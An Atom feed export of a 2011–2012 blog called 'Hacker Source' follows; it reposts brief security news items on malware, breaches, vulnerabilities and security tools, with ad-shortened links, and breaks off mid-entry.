<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-2211767872603727128</id><updated>2012-02-17T08:49:49.053+07:00</updated><category term='PHP'/><category term='Anonymouse'/><category term='Malware'/><category term='Download'/><category term='Deface'/><category term='Vacancy'/><category term='Proxy'/><category term='Anti Virus'/><category term='Virus'/><category term='Vulnerability'/><category term='Hacking Security'/><category term='Tutorial'/><category term='Exploit'/><category term='XSS'/><category term='VB'/><category term='OS'/><category term='Windows 7'/><category term='Denial of Service'/><category term='Tube'/><title type='text'>Hacker Source</title><subtitle type='html'>Concerning security source and hacking</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://source-x.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default?start-index=101&amp;max-results=100'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>101</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-3312488990684994462</id><published>2012-02-08T21:47:00.000+07:00</published><updated>2012-02-08T21:47:45.224+07:00</updated><title type='text'>Zulu – Zscaler Malware Scanning Service</title><content type='html'>Zscaler has launched a new freE online service called Zulu that can assess the security risk associated with URLs by analyzing the content they point to, as well as the reputation of their corresponding domain names and IP addresses.&lt;br /&gt;&lt;br /&gt;Zulu allows security savvy users who investigate various web attacks to choose what User-Agent and Referrer headers the scanner will use when accessing a URL. “A unique benefit of this approach is that we can deliver a risk score even when the page content is no longer available,” said Michael Sutton, vice president of security research at &lt;a href="http://www.thatcoin.com/2012/02/zulu-zscaler-malware-scanning-service/"&gt;Zscaler&lt;/a&gt;. “While we can’t access the page, we can still assess the URL and host and when they deliver a high risk score despite a lack of page content, one can often conclude the page was indeed malicious but has since been taken down,” he explained. &lt;a href="http://www.thatcoin.com/2012/02/zulu-zscaler-malware-scanning-service/"&gt;Keep reading&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[ &lt;a href="http://thehackernews.com" target="_blank"&gt;source&lt;/a&gt; ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-3312488990684994462?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3312488990684994462'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3312488990684994462'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2012/02/zulu-zscaler-malware-scanning-service.html' title='Zulu – Zscaler Malware Scanning Service'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-3016941588415285042</id><published>2012-02-05T23:16:00.000+07:00</published><updated>2012-02-05T23:16:30.948+07:00</updated><title type='text'>SP Toolkit – Open Source Phishing Education Toolkit</title><content type='html'>&lt;a href="http://www.thatcoin.com/2012/02/sp-toolkit-open-source-phishing-education-toolkit/"&gt;SP Toolkit – Open Source Phishing Education Toolkit&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;A new open source toolkit makes it ridiculously simple to set up phishing Web sites and lures. The software was designed to help companies test the phishing awareness of their employees, but as with most security tools, this one could be abused by miscreants to launch malicious attacks.&lt;br /&gt;&lt;br /&gt;The spt project is an open source phishing education toolkit that aims to help in securing the mind as opposed to securing computers. &lt;a href="http://www.thatcoin.com/2012/02/sp-toolkit-open-source-phishing-education-toolkit/"&gt;Keep reading&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://adf.ly/4JetE"&gt;Kaspersky Virus Removal Tool&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[ &lt;a href="http://thehackernews.com" target="_blank"&gt;source&lt;/a&gt; ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-3016941588415285042?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3016941588415285042'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3016941588415285042'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2012/02/sp-toolkit-open-source-phishing.html' title='SP Toolkit – Open Source Phishing Education Toolkit'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-7153075781541945619</id><published>2012-02-01T22:01:00.000+07:00</published><updated>2012-02-01T22:01:59.848+07:00</updated><title type='text'>Fake Angry Birds Game spreading Malware from Android Market</title><content type='html'>From last week premium rate SMS Trojans surfaced in the Android Market. Google has pulled 22 apps that are masquerading as legitimate versions of popular games like Angry Birds and Cut the Rope. Security researchers have discovered a way to bypass an Android smartphone owner’s permissions and access private data stored on their smartphone.&lt;br /&gt;&lt;br /&gt;Avast Blog explain this as – For example, if someone tried to look for “Cut the rope free”, this malicious application was in the fourth place in the search results. Apps published by the developer Miriada Production may look like well known Android games (Angry birds, Need for speed, World of Goo and others) and users could be easily confused.&lt;br /&gt;&lt;br /&gt;The fake apps include “Cut the Rope”, “Need for Speed”, “Assassins Creed”, “Where’s My Water? “,”Riptide GP”, “Great Little War Game”, “World of Goo”, “Angry Birds”, “Shoot The Birds”, “Talking Tom Cat 2″, “Bag It!” and “Talking Larry the Bird”. The apps have been pulled from the Android Market.&lt;br /&gt;The fraudulent apps would install a premium rate SMS Trojan that would rack up hidden charges on the user’s phone bill. The apps would lure customers into clicking on options that would send text messages to premium line numbers leaving the user to foot the bill. According to Lookout Mobile Security, the new threat called RuFraud has been found in an initial batch of apps on the Android Market that include horoscope apps, wallpapers, and game apps that pretend to be legitimate games like Angry Birds.&lt;br /&gt;&lt;br /&gt;What will happens if these threats are installed in your mobile devices?&lt;br /&gt;It will attempts to send text messages containing the string “798657” to premium-rate numbers using the infected device’s current default SMS Center (SMSC) by exploiting the Permissions function (android.permission.SEND_SMS), Capable of sending an affected user’s GPS location via HTTP POST, Opens several ports and connects to specific URLs to receive and execute commands from a remote user, Gathers information like International Mobile Equipment Identity (IMEI) and International Mobile Subscriber Identity (IMSI) numbers from infected systems, which is then sent to a specific site and Secretly forwards all incoming text messages to a remote user.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.thatcoin.com/2012/01/fake-angry-birds-game-spreading-malware-from-android-market/"&gt;Keep reading&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;[ &lt;a href="http://thehackernews.com"&gt;source&lt;/a&gt; ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-7153075781541945619?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/7153075781541945619'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/7153075781541945619'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2012/02/fake-angry-birds-game-spreading-malware.html' title='Fake Angry Birds Game spreading Malware from Android Market'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-3608677896889692938</id><published>2012-01-29T23:40:00.002+07:00</published><updated>2012-01-29T23:44:45.767+07:00</updated><title type='text'>Linux.com down again due to Security Breach</title><content type='html'>Linux Foundation infrastructure including LinuxFoundation.org, Linux.com, and their subdomains are again down for maintenance due to a security breach that was discovered on September 8, 2011. Investigators yet can’t elaborate the source of attack. Regarding coming back online , Linux.com says “Our team is working around the clock to restore these important services. We are working with authorities and exercising both extreme caution and diligence. Services will begin coming back online in the coming days and will keep you informed every step of the way.” The added “We are in the process of restoring services in a secure manner as quickly as possible. As with any intrusion and as a matter of caution, you should consider the passwords and SSH keys that you have used on these sites compromised. If you have reused these passwords on other sites, please change them immediately. We are currently auditing all systems and will update this statement when we have more information.”&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.thatcoin.com/2012/01/linux-com-down-again-due-to-security-breach/"&gt;Keep reading&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-3608677896889692938?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3608677896889692938'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3608677896889692938'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2012/01/blog-post.html' title='Linux.com down again due to Security Breach'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-6658682072867500889</id><published>2012-01-23T00:36:00.000+07:00</published><updated>2012-01-23T00:36:47.227+07:00</updated><title type='text'>SOPA in US and Censorship in India</title><content type='html'>As US senators mull over the SOPA(Stopping Online Piracy Act) and PIPA(Protecting Intellectual Property Act) bills, the world stands witness to a historic moment. Almost all big IT companies like Google, Wikipedia, Facebook, Mozilla, Godaddy, etc are speaking in one unanimous voice against SOPA and Internet Censorship. The draconian provisions of SOPA/PIPA are bound to create the deathbed of internet freedom and free speech, and if a careful reading of the proposed legislation is done, one realizes that it is likely to have the same impact on India&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.thatcoin.com/2012/01/sopa-in-us-and-censorship-in-india/"&gt;Keep reading&lt;/a&gt;&lt;br /&gt;&lt;a href="http://adf.ly/4JetE"&gt;&lt;br /&gt;The Kaspersky Virus Removal Tool&lt;br /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-6658682072867500889?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6658682072867500889'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6658682072867500889'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2012/01/sopa-in-us-and-censorship-in-india.html' title='SOPA in US and Censorship in India'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-9217201932156952230</id><published>2012-01-13T16:29:00.000+07:00</published><updated>2012-01-13T16:29:56.143+07:00</updated><title type='text'>Facebook Security Tips</title><content type='html'>More than 800 members is on Facebook. Making social networking site Facebook as the world’s largest. In addition to the large member, Internet criminals are also interested in the existence of Facebook.&lt;br /&gt;Facebook members should be ready to receive spam every day. 20% risk of malware attacks and 600 thousand pirated accounts reportedly used every day.&lt;br /&gt;How to cope with attacks on Facebook. Can be started from a few tips below.&lt;br /&gt;Use strong passwords with a combination of numbers and letters long.&lt;br /&gt;Never accept an unknown friend.&lt;br /&gt;Remember always your friends who do the sharing and sending messages to you.&lt;br /&gt;Enable HTTPS feature of the settings in Facebook.&lt;br /&gt;Do not click unnecessary links or unclear.&lt;br /&gt;Download Free Security software is also software for security.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://adf.ly/4JetE "&gt;The Kaspersky Virus Removal Tool&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[ &lt;a href="http://www.thatcoin.com/2012/01/facebook-security-tips/"&gt;Thatcoin.com&lt;/a&gt; ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-9217201932156952230?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/9217201932156952230'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/9217201932156952230'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2012/01/facebook-security-tips.html' title='Facebook Security Tips'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-155832730679467766</id><published>2012-01-07T13:32:00.000+07:00</published><updated>2012-01-07T13:32:51.824+07:00</updated><title type='text'>Ramnit Attacks Facebook Account</title><content type='html'>Win32/Ramnit virus penetrated into networking site Facebook. Win32/Ramnit virus has managed to steal more than 45 thousand Facebook members login worldwide. The majority are exposed to the virus in England and France. Win32/Ramnit brought some parts of other malware to infect Windows systems.&lt;br /&gt;Win32/Ramnit found in April 2010 as a category of Malware. Microsoft Malware Protection Center attack portray Ramnit Windows executable file (EXE), SCR, DLL and HTML, then steal important data and store data FTP and browser cookies.&lt;br /&gt;&lt;br /&gt;July 2011, a report from Symantec estimates Ramnit new variants appear. August 2011 from Tusteer mention, &lt;a href="http://www.thatcoin.com/2012/01/ramnit-attacks-facebook-account/"&gt;Ramnit&lt;/a&gt; designed to steal financial data. During September to December 2011, an estimated 800 thousand computers have been infected Ramnit. Varian Ramnit re-emerged, allegedly targeting a Facebook account as a member login.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://adf.ly/4JetE"&gt;&lt;br /&gt;The Kaspersky Virus Removal Tool&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.thatcoin.com/2012/01/ramnit-attacks-facebook-account/"&gt;&lt;br /&gt;Keep reading&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-155832730679467766?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/155832730679467766'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/155832730679467766'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2012/01/ramnit-attacks-facebook-account.html' title='Ramnit Attacks Facebook Account'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-1100421687320120480</id><published>2012-01-06T16:49:00.000+07:00</published><updated>2012-01-06T16:49:28.075+07:00</updated><title type='text'>BackBox 2.0.1</title><content type='html'>The BackBox team is proud to announce the release 2.01 of &lt;a href="http://www.thatcoin.com/2012/01/backbox-linux-2-01/"&gt;BackBox Linux&lt;/a&gt;.The new release include features such as Ubuntu 11.04, Linux Kernel 2.6.38 and Xfce 4.8.0. The ISO images (32bit &amp; 64bit) can be downloaded from the following location: http://www.backbox.org/downloads&lt;br /&gt;&lt;br /&gt;What’s new&lt;br /&gt;&lt;br /&gt;System upgrade&lt;br /&gt;Performance boost&lt;br /&gt;New look&lt;br /&gt;Improved start menu&lt;br /&gt;&lt;br /&gt;Bug corrections&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.thatcoin.com/2012/01/backbox-linux-2-01/"&gt;Keep reading&lt;/a&gt; &lt;br /&gt;&lt;a href="http://adf.ly/4Jf4n"&gt;&lt;br /&gt;Blackberry OS 10 News&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-1100421687320120480?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1100421687320120480'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1100421687320120480'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2012/01/backbox-201.html' title='BackBox 2.0.1'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-3148914511257930855</id><published>2012-01-01T21:44:00.000+07:00</published><updated>2012-01-01T21:44:03.973+07:00</updated><title type='text'>Best Free Android Security Software Avast Antivirus</title><content type='html'>For you who longing for free Android antivirus, this is an exciting THN news for you. Avast, one of the famous antivirus vendors, now has launched Android Antivirus you can use for free! This Antivirus mobile is named Avast Mobile Security.&lt;br /&gt;Avast Free Mobile Security supports a number of features that are usually available only in paid-for Android security software. These include privacy reports, call and SMS filtering, SIM-card change notifications, firewall and application management.&lt;br /&gt;By using Avast Mobile Security in your Android phone, your cell phone will be protected from virus, threat, hacker, even it’s able to minimize your loss if your Android cell phone is stolen. The antivirus component supports real-time protection and automatic updates. Updates can be configured to only be downloaded over certain types of connections and the interface can be protected with a password. &lt;br /&gt;&lt;a href="http://www.thatcoin.com/2011/12/best-free-android-security-software-avast-antivirus/"&gt;&lt;br /&gt;Keep reading&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[ &lt;a href="http://Thatcoin.com"&gt;Thatcoin.com&lt;/a&gt; ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-3148914511257930855?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3148914511257930855'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3148914511257930855'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2012/01/best-free-android-security-software.html' title='Best Free Android Security Software Avast Antivirus'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-4419651889416263760</id><published>2011-12-22T17:49:00.000+07:00</published><updated>2011-12-22T17:49:47.805+07:00</updated><title type='text'>OWASP LiveCD</title><content type='html'>Web Testing OWASP LiveCD – contains a selection of programs to test the safety and performance audit of the code of web-applications, acts as an analog of the well-known tool for testing network security BackTrack, but specializes in the web. Last Release OWASP LiveCD was released in 2007, last summer decided to complete processing of the distribution.&lt;br /&gt;The composition of &lt;a href="http://www.thatcoin.com/2011/12/web-testing-owasp-livecd/"&gt;OWASP LiveCD&lt;/a&gt; includes programs such as Httprint to determine the type http-server on circumstantial evidence, vulnerability scanners in web-applications Grendel Scan and w3af, utilities to identify opportunities to introduce SQL code SQLiX and sqlmap, means of brute force, the local proxy WebScarab , Paros Proxy, Rat Proxy and Burp Suite, Firefox c 1925 amendments to debug sites. &lt;br /&gt;&lt;a href="http://adf.ly/3d8Y5"&gt;&lt;br /&gt;Microsoft Patch For Duqu&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.thatcoin.com/2011/12/web-testing-owasp-livecd/"&gt;&lt;br /&gt;Keep reading&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-4419651889416263760?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/4419651889416263760'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/4419651889416263760'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/12/owasp-livecd.html' title='OWASP LiveCD'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-482923698713092055</id><published>2011-12-20T22:21:00.002+07:00</published><updated>2011-12-20T22:21:28.494+07:00</updated><title type='text'>Windows Phone 7.5 Denial of Service Attack Vulnerability</title><content type='html'>Windows Phone 7.5 Denial of Service Attack Vulnerability&lt;br /&gt;A malicious SMS sent to a Windows Phone 7.5 device will force it to reboot and lock down the messaging hub . WinRumors reader Khaled Salameh discovered the flaw and reported it to us on Monday. WinRumors said tests revealed that the flaw affected a variety of devices running different builds of the mobile operating system. A Facebook chat message and Windows Live Messenger message will also trigger the bug.&lt;br /&gt;&lt;a href="http://adf.ly/4JfFB"&gt;&lt;br /&gt;Keep reading &lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-482923698713092055?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/482923698713092055'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/482923698713092055'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/12/windows-phone-75-denial-of-service.html' title='Windows Phone 7.5 Denial of Service Attack Vulnerability'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-5528302959424083017</id><published>2011-12-17T02:26:00.000+07:00</published><updated>2011-12-17T02:26:40.346+07:00</updated><title type='text'>The Kaspersky Virus Removal Tool</title><content type='html'>The Kaspersky Virus Removal Tool application was designed to be another virus scanner and detection software from Kaspersky. The produst will scan the specified locations for any virus threats and remove them or send to Quarantine folder.&lt;br /&gt;&lt;a href="http://www.thatcoin.com/2011/12/the-kaspersky-virus-removal-tool/"&gt;Kaspersky Virus Removal Tool&lt;/a&gt; 2010 is a utility designed to remove all types of threats from computers. Kaspersky Virus Removal Tool 2010 uses the effective detection algorithms realized in Kaspersky Anti-Virus and AVZ.&lt;br /&gt;Kaspersky Virus Removal Tool 2010 does not provide resident protection for your computer. After disinfecting a computer, you are supposed to remove the tool and install a full version of antivirus software.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://adf.ly/45c0K "&gt;Comodo Cleaning Essentials&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[ &lt;a href="http://www.thatcoin.com"&gt;Thatcoin.com&lt;/a&gt; ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-5528302959424083017?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5528302959424083017'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5528302959424083017'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/12/kaspersky-virus-removal-tool.html' title='The Kaspersky Virus Removal Tool'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-8532784442850434768</id><published>2011-12-09T02:30:00.000+07:00</published><updated>2011-12-09T02:30:34.054+07:00</updated><title type='text'>Yahoo Messenger 0-Day Exploit</title><content type='html'>Security researchers have discovered an unpatched flaw in Yahoo! Messenger that allows miscreants to change any user's status message. The vulnerability was discovered in the wild by security researchers from antivirus vendor BitDefender while investigating a customer's report about unusual Yahoo Messenger behavior.&lt;br /&gt;&lt;br /&gt;The zero-day exploit is present in versions 11.x of the Yahoo Messenger client - including the very last released version. The flaw appears to be located in the application's file transfer API (application programming interface) and allows attackers to send malformed requests that result in the execution of commands without any interaction from victims.&lt;br /&gt;&lt;br /&gt;"An attacker can write a script in less than 50 lines of code to malform the message sent via the YIM protocol to the victim," said Bogdan Botezatu, an e-threats analysis &amp; communication specialist at BitDefender. "Status changing appears to be only one of the things the attacker can abuse. We're currently investigating what other things they may achieve," he added.&lt;br /&gt;&lt;br /&gt;The attacker sends a supposed file to a target that is actually an iframe that swaps the status message for the attacker's customised text. If successfully executed, a victim will have no indication that his or her status message has been rewritten. The ruse might be used to gain affiliate incomes by promoting dodgy sites as well as directing users towards sites loaded with exploits or scareware scams.&lt;br /&gt;&lt;a href="http://adf.ly/45c2O"&gt;&lt;br /&gt;Keep reading&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-8532784442850434768?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/8532784442850434768'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/8532784442850434768'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/12/yahoo-messenger-0-day-exploit.html' title='Yahoo Messenger 0-Day Exploit'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-7683580115208624731</id><published>2011-12-07T03:01:00.000+07:00</published><updated>2011-12-07T03:01:42.533+07:00</updated><title type='text'>COMODO Cleaning Essentials</title><content type='html'>COMODO Cleaning Essentials features:&lt;br /&gt;&lt;br /&gt;Portable: No installation is necessary!&lt;br /&gt;DACS, Distributed and Collaborative Scanning&lt;br /&gt;Rootkit and hidden file/key scanner&lt;br /&gt;Aggressive file removing capabilities&lt;br /&gt;KillSwitch, advanced system activity monitoring tool&lt;br /&gt;&lt;br /&gt;&lt;a href=" http://personalfirewall.comodo.com" target="_blank"&gt;Homepage&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;&lt;a href="http://download.comodo.com/cce/download/setups/cce_1.8.207117.137_x32.zip " target="_blank"&gt;Download COMODO Cleaning Essentials 32 Bit Version&lt;/a&gt;&lt;br /&gt;&lt;a href="http://download.comodo.com/cce/download/setups/cce_1.8.207117.137_x64.zip " target="_blank"&gt;&lt;br /&gt;Download COMODO Cleaning Essentials 64 Bit Version&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-7683580115208624731?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/7683580115208624731'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/7683580115208624731'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/12/comodo-cleaning-essentials.html' title='COMODO Cleaning Essentials'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-1887606053347678007</id><published>2011-12-04T21:18:00.000+07:00</published><updated>2011-12-04T21:18:05.675+07:00</updated><title type='text'>Worm Zeuz re-emerged in the form of links</title><content type='html'>Be careful with your Facebook when you see a display like this picture. &lt;a 